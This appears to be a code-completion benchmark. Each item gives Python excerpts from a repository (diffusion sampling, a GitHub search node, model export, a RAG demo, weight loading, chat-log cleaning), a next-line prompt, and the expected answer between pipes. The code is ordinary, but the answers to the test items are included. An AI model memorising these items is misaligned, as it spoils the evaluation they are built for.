def renorm_thresholding(x0, value):
# renorm
pred_max = x0.max()
pred_min = x0.min()
pred_x0 = (x0 - pred_min) / (pred_max - pred_min) # 0 ... 1
pred_x0 = 2 * pred_x0 - 1.0 # -1 ... 1
s = torch.quantile(rearrange(pred_x0, "b ... -> b (...)").abs(), value, dim=-1)
s.clamp_(min=1.0)
s = s.view(-1, *((1,) * (pred_x0.ndim - 1)))
# clip by threshold
# pred_x0 = pred_x0.clamp(-s, s) / s # needs newer pytorch # TODO bring back to pure-gpu with min/max
# temporary hack: numpy on cpu
pred_x0 = (
np.clip(pred_x0.cpu().numpy(), -s.cpu().numpy(), s.cpu().numpy())
/ s.cpu().numpy()
)
pred_x0 = torch.tensor(pred_x0).to(self.model.device)
# re.renorm
pred_x0 = (pred_x0 + 1.0) / 2.0 # 0 ... 1
pred_x0 = (pred_max - pred_min) * pred_x0 + pred_min # orig range
return pred_x0
# Path: extern/ldm_zero123/models/diffusion/sampling_util.py
def spatial_norm_thresholding(x0, value):
# b c h w
s = x0.pow(2).mean(1, keepdim=True).sqrt().clamp(min=value)
return x0 * (value / s)
# Path: extern/ldm_zero123/modules/diffusionmodules/util.py
def extract_into_tensor(a, t, x_shape):
b, *_ = t.shape
out = a.gather(-1, t)
return out.reshape(b, *((1,) * (len(x_shape) - 1)))
# Path: extern/ldm_zero123/modules/diffusionmodules/util.py
def make_ddim_sampling_parameters(alphacums, ddim_timesteps, eta, verbose=True):
# select alphas for computing the variance schedule
alphas = alphacums[ddim_timesteps]
alphas_prev = np.asarray([alphacums[0]] + alphacums[ddim_timesteps[:-1]].tolist())
# according the the formula provided in https://arxiv.org/abs/2010.02502
sigmas = eta * np.sqrt(
(1 - alphas_prev) / (1 - alphas) * (1 - alphas / alphas_prev)
)
if verbose:
print(
f"Selected alphas for ddim sampler: a_t: {alphas}; a_(t-1): {alphas_prev}"
)
print(
f"For the chosen value of eta, which is {eta}, "
f"this results in the following sigma_t schedule for ddim sampler {sigmas}"
)
return sigmas, alphas, alphas_prev
# Path: extern/ldm_zero123/modules/diffusionmodules/util.py
def make_ddim_timesteps(
ddim_discr_method, num_ddim_timesteps, num_ddpm_timesteps, verbose=True
):
if ddim_discr_method == "uniform":
c = num_ddpm_timesteps // num_ddim_timesteps
ddim_timesteps = np.asarray(list(range(0, num_ddpm_timesteps, c)))
elif ddim_discr_method == "quad":
ddim_timesteps = (
(np.linspace(0, np.sqrt(num_ddpm_timesteps * 0.8), num_ddim_timesteps)) ** 2
).astype(int)
else:
raise NotImplementedError(
f'There is no ddim discretization method called "{ddim_discr_method}"'
)
# assert ddim_timesteps.shape[0] == num_ddim_timesteps
# add one to get the final alpha values right (the ones from first scale to data during sampling)
steps_out = ddim_timesteps + 1
if verbose:
print(f"Selected timesteps for ddim sampler: {steps_out}")
return steps_out
# Path: extern/ldm_zero123/modules/diffusionmodules/util.py
def noise_like(shape, device, repeat=False):
repeat_noise = lambda: torch.randn((1, *shape[1:]), device=device).repeat(
shape[0], *((1,) * (len(shape) - 1))
)
noise = lambda: torch.randn(shape, device=device)
return repeat_noise() if repeat else noise()
# Path: extern/ldm_zero123/models/diffusion/ddim.py
from functools import partial
from tqdm import tqdm
from extern.ldm_zero123.models.diffusion.sampling_util import (
norm_thresholding,
renorm_thresholding,
spatial_norm_thresholding,
)
from extern.ldm_zero123.modules.diffusionmodules.util import (
extract_into_tensor,
make_ddim_sampling_parameters,
make_ddim_timesteps,
noise_like,
)
import numpy as np
import torch
"""SAMPLING ONLY."""
class DDIMSampler(object):
def __init__(self, model, schedule="linear", **kwargs):
super().__init__()
self.model = model
self.ddpm_num_timesteps = model.num_timesteps
self.schedule = schedule
def to(self, device):
"""Same as to in torch module
Don't really underestand why this isn't a module in the first place"""
for k, v in self.__dict__.items():
if isinstance(v, torch.Tensor):
new_v = getattr(self, k).to(device)
setattr(self, k, new_v)
def register_buffer(self, name, attr):
if type(attr) == torch.Tensor:
if attr.device != torch.device("cuda"):
attr = attr.to(torch.device("cuda"))
setattr(self, name, attr)
def make_schedule(
self, ddim_num_steps, ddim_discretize="uniform", ddim_eta=0.0, verbose=True
):
| self.ddim_timesteps = make_ddim_timesteps( |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: YORG-AI/Open-Assistant
# Path: package/src/yorgassistant/core/nodes/base_node.py
class BaseNode(ABC):
config: NodeConfig
func_mapping: dict[str, Callable]
def __init__(self):
# initialize func_mapping
self.func_mapping = {}
avail_funcs = [
func_name for func_name in dir(self) if not func_name.startswith("_")
]
for func_name in self.config.functions.keys():
if func_name not in avail_funcs:
raise Exception(
f"Node {self.config.name} does not contain {func_name} method."
)
else:
self.func_mapping[func_name] = getattr(self, func_name)
def run(self, input: NodeInput):
if input.func_name not in self.func_mapping.keys():
raise Exception(
f"Node {self.config.name} does not contain {input.func_name} method."
)
else:
return self.func_mapping[input.func_name](input.func_input)
# Path: package/src/yorgassistant/core/nodes/base_node.py
class NodeConfig(BaseModel):
name: str = Field(description="Node 名称")
description: str = Field(default="", description="Node 描述")
functions: dict[str, str] = Field(default={}, description="Node 所有功能描述")
# Path: package/src/yorgassistant/core/nodes/github/github_node.py
class GithubNode(BaseNode):
def __init__(self):
self.token = os.environ.get("GITHUB_TOKEN") # Retrieving the token from the environment
if not self.token:
raise ValueError("GITHUB_TOKEN is not set in the environment.")
self.g = Github(self.token) # Initializing the GitHub instance with the token
super().__init__()
# Path: package/src/yorgassistant/core/nodes/github/github_model.py
class SearchCodeInput(BaseSearchInput):
sort: str = None
order: str = None
# Path: package/src/yorgassistant/core/nodes/github/github_model.py
class SearchCommitsInput(BaseSearchInput):
sort: str = None
order: str = None
# Path: package/src/yorgassistant/core/nodes/github/github_model.py
class SearchIssuesAndPRsInput(BaseSearchInput):
sort: str = None
order: str = None
# Path: package/src/yorgassistant/core/nodes/github/github_model.py
class SearchLabelsInput(BaseSearchInput):
repository_id: int
sort: str = None
order: str = None
# Path: package/src/yorgassistant/core/nodes/github/github_model.py
class SearchRepositoriesInput(BaseSearchInput):
sort: str = None
order: str = None
# Path: package/src/yorgassistant/core/nodes/github/github_model.py
class SearchTopicsInput(BaseSearchInput):
sort: str = None
order: str = None
# Path: package/src/yorgassistant/core/nodes/github/github_model.py
class SearchUsersInput(BaseSearchInput):
sort: str = None
order: str = None
# Path: package/src/yorgassistant/core/nodes/github/github_search.py
from ..base_node import BaseNode, NodeConfig
from .github_node import GithubNode
from .github_model import (
SearchCodeInput,
SearchCommitsInput,
SearchIssuesAndPRsInput,
SearchLabelsInput,
SearchRepositoriesInput,
SearchTopicsInput,
SearchUsersInput,
)
github_search_node_config = {
"name": "github_search",
"description": "A node for searching various entities on GitHub.",
"functions": {
"search_code": "Search code.",
"search_commits": "Search commits.",
"search_issues_and_prs": "Search issues and pull requests.",
"search_labels": "Search labels.",
"search_repositories": "Search repositories.",
"search_topics": "Search topics.",
"search_users": "Search users.",
},
}
| class GithubSearchNode(GithubNode): |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: zju3dv/4K4D
# Path: easyvolcap/utils/data_utils.py
def to_numpy(batch, non_blocking=False, ignore_list: bool = False) -> Union[List, Dict, np.ndarray]: # almost always exporting, should block
if isinstance(batch, (tuple, list)) and not ignore_list:
batch = [to_numpy(b, non_blocking, ignore_list) for b in batch]
elif isinstance(batch, dict):
batch = dotdict({k: to_numpy(v, non_blocking, ignore_list) for k, v in batch.items()})
elif isinstance(batch, torch.Tensor):
batch = batch.detach().to('cpu', non_blocking=non_blocking).numpy()
else: # numpy and others
batch = np.asarray(batch)
return batch
# Path: easyvolcap/utils/net_utils.py
def save_npz(model: nn.Module,
model_dir: str = '',
epoch: int = -1,
latest: int = True,
):
from easyvolcap.utils.data_utils import to_numpy
npz_path = join(model_dir, 'latest.npz' if latest else f'{epoch}.npz')
state_dict = model.state_dict() if not isinstance(model, DDP) else model.module.state_dict()
param_dict = to_numpy(state_dict) # a shallow dict
os.makedirs(dirname(npz_path), exist_ok=True)
np.savez_compressed(npz_path, **param_dict)
log(yellow(f'Saved model {blue(npz_path)} at epoch {blue(epoch)}'))
# Path: scripts/realtime4dv/charger.py
from os.path import join
from easyvolcap.utils.console_utils import *
from easyvolcap.utils.data_utils import to_numpy
from easyvolcap.utils.net_utils import save_npz
from easyvolcap.scripts.main import test # will do everything a normal user would do
from easyvolcap.engine import cfg
from easyvolcap.engine import SAMPLERS
from easyvolcap.runners.volumetric_video_runner import VolumetricVideoRunner
import sys
import torch
import argparse
# This function will try to invoke evc programmatically
@catch_throw
def main():
# fmt: off
sys.path.append('.')
sep_ind = sys.argv.index('--')
our_args = sys.argv[1:sep_ind]
evv_args = sys.argv[sep_ind + 1:]
sys.argv = [sys.argv[0]] + ['-t','test'] + evv_args
parser = argparse.ArgumentParser()
parser.add_argument('--sampler', type=str, default='SuperChargedR4DVB')
parser.add_argument('--sub_sampler', type=str, default='SuperChargedR4DV')
parser.add_argument('--exp_name', type=str, default='scr4dvb_dance3')
parser.add_argument('--save_fp32', action='store_true')
parser.add_argument('--save_pt', action='store_true')
parser.add_argument('--no_save_npz', action='store_false', dest='save_npz')
args = parser.parse_args(our_args)
# You have to save at least one type of model
| assert args.save_pt or args.save_npz |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: pchunduri6/rag-demystified
# Path: subquestion_generator.py
def generate_subquestions(
question,
file_names: List[str] = None,
system_prompt=DEFAULT_SUBQUESTION_GENERATOR_PROMPT,
user_task=DEFAULT_USER_TASK,
llm_model="gpt-4-0613",
):
"""Generates a list of subquestions from a user question along with the
file name and the function to use to answer the question using OpenAI LLM.
"""
FilenameEnum = Enum("FilenameEnum", {x.upper(): x for x in file_names})
FilenameEnum.__doc__ = f"The names of the file to use to answer the corresponding subquestion - e.g. {file_names[0]}"
# Create pydantic class dynamically
QuestionBundle = create_model(
"QuestionBundle",
question=(
str,
Field(
None, description="The subquestion extracted from the user's question"
),
),
function=(FunctionEnum, Field(None)),
file_name=(FilenameEnum, Field(None)),
)
SubQuestionBundleList = create_model(
"SubQuestionBundleList",
subquestion_bundle_list=(
List[QuestionBundle],
Field(
None,
description="A list of subquestions - each item in the list contains a question, a function, and a file name",
),
),
__base__=OpenAISchema,
)
user_prompt = f"{user_task}\n Here is the user question: {question}"
few_shot_examples = [
{
"role": "user",
"content": "Compare the population of Atlanta and Toronto?",
},
{
"role": "function",
"name": "SubQuestionBundleList",
"content": """
{
"subquestion_bundle_list": [
{
"question": "What is the population of Atlanta?",
"function": "vector_retrieval",
"file_name": "Atlanta"
},
{
"question": "What is the population of Toronto?"
"function": "vector_retrieval",
"file_name": "Toronto"
}
]
}""",
},
{
"role": "user",
"content": "Summarize the history of Chicago and Houston.",
},
{
"role": "function",
"name": "SubQuestionBundleList",
"content": """
{
"subquestion_bundle_list": [
{
"question": "What is the history of Chicago?",
"function": "llm_retrieval",
"file_name": "Chicago"
},
{
"question": "What is the history of Houston?",
"function": "llm_retrieval",
"file_name": "Houston"
}
]
}""",
},
]
response, cost = llm_call(
model=llm_model,
function_schema=[SubQuestionBundleList.openai_schema],
output_schema={"name": SubQuestionBundleList.openai_schema["name"]},
system_prompt=system_prompt,
user_prompt=user_prompt,
few_shot_examples=few_shot_examples,
)
subquestions_list = json.loads(response.choices[0].message.function_call.arguments)
subquestions_pydantic_obj = SubQuestionBundleList(**subquestions_list)
subquestions_list = subquestions_pydantic_obj.subquestion_bundle_list
return subquestions_list, cost
# Path: openai_utils.py
def llm_call(
model,
function_schema=None,
output_schema=None,
system_prompt="You are an AI assistant that answers user questions using the context provided.",
user_prompt="Please help me answer the following question:",
few_shot_examples=None,
):
kwargs = {}
if function_schema is not None:
kwargs["functions"] = function_schema
if output_schema is not None:
kwargs["function_call"] = output_schema
messages = []
if system_prompt is not None:
messages.append({"role": "system", "content": system_prompt})
if few_shot_examples is not None:
messages.extend(few_shot_examples)
if user_prompt is not None:
messages.append({"role": "user", "content": user_prompt})
response = completion_with_backoff(
model=model,
temperature=0,
messages=messages,
**kwargs
)
# print cost of call
call_cost = llm_call_cost(response)
print(f"🤑 LLM call cost: ${call_cost:.4f}")
return response, call_cost
# Path: complex_qa.py
import os
import requests
import warnings
import evadb
from dotenv import load_dotenv
from pathlib import Path
from subquestion_generator import generate_subquestions
from openai_utils import llm_call
warnings.filterwarnings("ignore")
if not load_dotenv():
print(
"Could not load .env file or it is empty. Please check if it exists and is readable."
)
exit(1)
def generate_vector_stores(cursor, docs):
"""Generate a vector store for the docs using evadb.
"""
for doc in docs:
print(f"Creating vector store for {doc}...")
cursor.query(f"DROP TABLE IF EXISTS {doc};").df()
cursor.query(f"LOAD DOCUMENT 'data/{doc}.txt' INTO {doc};").df()
evadb_path = os.path.dirname(evadb.__file__)
cursor.query(
f"""CREATE FUNCTION IF NOT EXISTS SentenceFeatureExtractor
IMPL '{evadb_path}/functions/sentence_feature_extractor.py';
""").df()
cursor.query(
f"""CREATE TABLE IF NOT EXISTS {doc}_features AS
SELECT SentenceFeatureExtractor(data), data FROM {doc};"""
).df()
cursor.query(
f"CREATE INDEX IF NOT EXISTS {doc}_index ON {doc}_features (features) USING FAISS;"
).df()
print(f"Successfully created vector store for {doc}.")
def vector_retrieval(cursor, llm_model, question, doc_name):
"""Returns the answer to a factoid question using vector retrieval.
"""
res_batch = cursor.query(
f"""SELECT data FROM {doc_name}_features
ORDER BY Similarity(SentenceFeatureExtractor('{question}'),features)
LIMIT 3;"""
).df()
context_list = []
for i in range(len(res_batch)):
context_list.append(res_batch["data"][i])
context = "\n".join(context_list)
user_prompt = f"""You are an assistant for question-answering tasks.
Use the following pieces of retrieved context to answer the question.
If you don't know the answer, just say that you don't know.
Use three sentences maximum and keep the answer concise.
Question: {question}
Context: {context}
Answer:"""
| response, cost = llm_call(model=llm_model, user_prompt=user_prompt) |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: predibase/lorax
# Path: server/lorax_server/utils/sources/source.py
class BaseModelSource:
def remote_weight_files(self, extension: str = None):
raise NotImplementedError
def weight_files(self, extension: str = None):
raise NotImplementedError
def download_weights(self, filenames: List[str]):
raise NotImplementedError
def download_model_assets(self):
""" The reason we need this function is that for s3
we need to download all the model files whereas for
hub we only need to download the weight files. And maybe
for other future sources we might need something different.
So this function will take the necessary steps to download
the needed files for any source """
raise NotImplementedError
# Path: server/lorax_server/utils/sources/source.py
def try_to_load_from_cache(
repo_cache: Path, revision: Optional[str], filename: str
) -> Optional[Path]:
"""Try to load a file from the Hugging Face cache"""
if revision is None:
revision = "main"
if not repo_cache.is_dir():
# No cache for this model
return None
refs_dir = repo_cache / "refs"
snapshots_dir = repo_cache / "snapshots"
# Resolve refs (for instance to convert main to the associated commit sha)
if refs_dir.is_dir():
revision_file = refs_dir / revision
if revision_file.exists():
with revision_file.open() as f:
revision = f.read()
# Check if revision folder exists
if not snapshots_dir.exists():
return None
cached_shas = os.listdir(snapshots_dir)
if revision and revision not in cached_shas:
# No cache for this revision and we won't try to return a random revision
return None
# Check if file exists in cache
cached_file = snapshots_dir / revision / filename
return cached_file if cached_file.is_file() else None
# Path: server/lorax_server/utils/sources/hub.py
import time
import os
from datetime import timedelta
from loguru import logger
from pathlib import Path
from typing import Optional, List
from huggingface_hub import HfApi, hf_hub_download
from huggingface_hub.constants import HUGGINGFACE_HUB_CACHE
from huggingface_hub.utils import (
LocalEntryNotFoundError,
EntryNotFoundError,
RevisionNotFoundError, # Import here to ease try/except in other part of the lib
)
from .source import BaseModelSource, try_to_load_from_cache
WEIGHTS_CACHE_OVERRIDE = os.getenv("WEIGHTS_CACHE_OVERRIDE", None)
def get_hub_model_local_dir(model_id: str) -> Path:
object_id = model_id.replace("/", "--")
repo_cache = Path(HUGGINGFACE_HUB_CACHE) / f"models--{object_id}"
return repo_cache
def weight_hub_files(
model_id: str, revision: Optional[str] = None, extension: str = ".safetensors"
) -> List[str]:
"""Get the weights filenames on the hub"""
api = HfApi()
info = api.model_info(model_id, revision=revision)
filenames = [
s.rfilename
for s in info.siblings
if s.rfilename.endswith(extension)
and len(s.rfilename.split("/")) == 1
and "arguments" not in s.rfilename
and "args" not in s.rfilename
and "training" not in s.rfilename
]
if not filenames:
raise EntryNotFoundError(
f"No {extension} weights found for model {model_id} and revision {revision}.",
None,
)
return filenames
def weight_files(
model_id: str, revision: Optional[str] = None, extension: str = ".safetensors"
) -> List[Path]:
"""Get the local files"""
# Local model
if Path(model_id).exists() and Path(model_id).is_dir():
local_files = list(Path(model_id).glob(f"*{extension}"))
if not local_files:
raise FileNotFoundError(
f"No local weights found in {model_id} with extension {extension}"
)
return local_files
try:
filenames = weight_hub_files(model_id, revision, extension)
except EntryNotFoundError as e:
if extension != ".safetensors":
raise e
# Try to see if there are pytorch weights
pt_filenames = weight_hub_files(model_id, revision, extension=".bin")
# Change pytorch extension to safetensors extension
# It is possible that we have safetensors weights locally even though they are not on the
# hub if we converted weights locally without pushing them
filenames = [
f"{Path(f).stem.lstrip('pytorch_')}.safetensors" for f in pt_filenames
]
if WEIGHTS_CACHE_OVERRIDE is not None:
files = []
for filename in filenames:
p = Path(WEIGHTS_CACHE_OVERRIDE) / filename
if not p.exists():
raise FileNotFoundError(
f"File {p} not found in {WEIGHTS_CACHE_OVERRIDE}."
)
files.append(p)
return files
repo_cache = get_hub_model_local_dir(model_id)
files = []
for filename in filenames:
| cache_file = try_to_load_from_cache( |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: codefuse-ai/Test-Agent
# Path: chat/server/monitor/basic_stats.py
NUM_SERVERS = 14
# Path: chat/server/monitor/clean_battle_data.py
def to_openai_format(messages):
roles = ["user", "assistant"]
ret = []
for i, x in enumerate(messages):
ret.append({"role": roles[i % 2], "content": x[1]})
return ret
# Path: chat/server/monitor/clean_battle_data.py
def replace_model_name(old_name):
return (
old_name.replace("bard", "palm-2")
.replace("claude-v1", "claude-1")
.replace("claude-instant-v1", "claude-instant-1")
.replace("oasst-sft-1-pythia-12b", "oasst-pythia-12b")
)
# Path: chat/utils.py
def detect_language(text: str) -> str:
"""Detect the langauge of a string."""
import polyglot # pip3 install polyglot pyicu pycld2
from polyglot.detect import Detector
from polyglot.detect.base import logger as polyglot_logger
import pycld2
polyglot_logger.setLevel("ERROR")
try:
lang_code = Detector(text).language.name
except (pycld2.error, polyglot.detect.base.UnknownLanguage):
lang_code = "unknown"
return lang_code
# Path: chat/server/monitor/clean_chat_data.py
import argparse
import datetime
import json
import os
import time
from pytz import timezone
from tqdm import tqdm
from chat.server.monitor.basic_stats import NUM_SERVERS
from chat.server.monitor.clean_battle_data import (
to_openai_format,
replace_model_name,
)
from chat.utils import detect_language
"""
Clean chatbot arena chat log.
Usage:
python3 clean_chat_data.py --mode conv_release
"""
NETWORK_ERROR_MSG = (
"NETWORK ERROR DUE TO HIGH TRAFFIC. PLEASE REGENERATE OR REFRESH THIS PAGE.".lower()
)
def get_log_files(max_num_files=None):
dates = []
for month in [4, 5, 6, 7]:
for day in range(1, 32):
dates.append(f"2023-{month:02d}-{day:02d}")
for month in [8]:
for day in range(1, 32):
dates.append(f"2023-{month:02d}-{day:02d}")
filenames = []
for d in dates:
for i in range(NUM_SERVERS):
name = os.path.expanduser(f"~/fastchat_logs/server{i}/{d}-conv.json")
if os.path.exists(name):
filenames.append(name)
max_num_files = max_num_files or len(filenames)
# filenames = list(reversed(filenames))
filenames = filenames[-max_num_files:]
return filenames
def clean_chat_data(log_files):
raw_data = []
for filename in tqdm(log_files, desc="read files"):
for retry in range(5):
try:
lines = open(filename).readlines()
break
except FileNotFoundError:
time.sleep(2)
for l in lines:
row = json.loads(l)
if row["type"] == "chat":
raw_data.append(row)
all_models = set()
all_ips = dict()
chats = []
ct_invalid_conv_id = 0
ct_invalid = 0
ct_network_error = 0
for row in raw_data:
if "conv_id" not in row["state"]:
ct_invalid_conv_id += 1
continue
conversation_id = row["state"]["conv_id"]
if conversation_id is None:
ct_invalid_conv_id += 1
continue
state = row["state"]
| conversation = to_openai_format(state["messages"][state["offset"] :]) |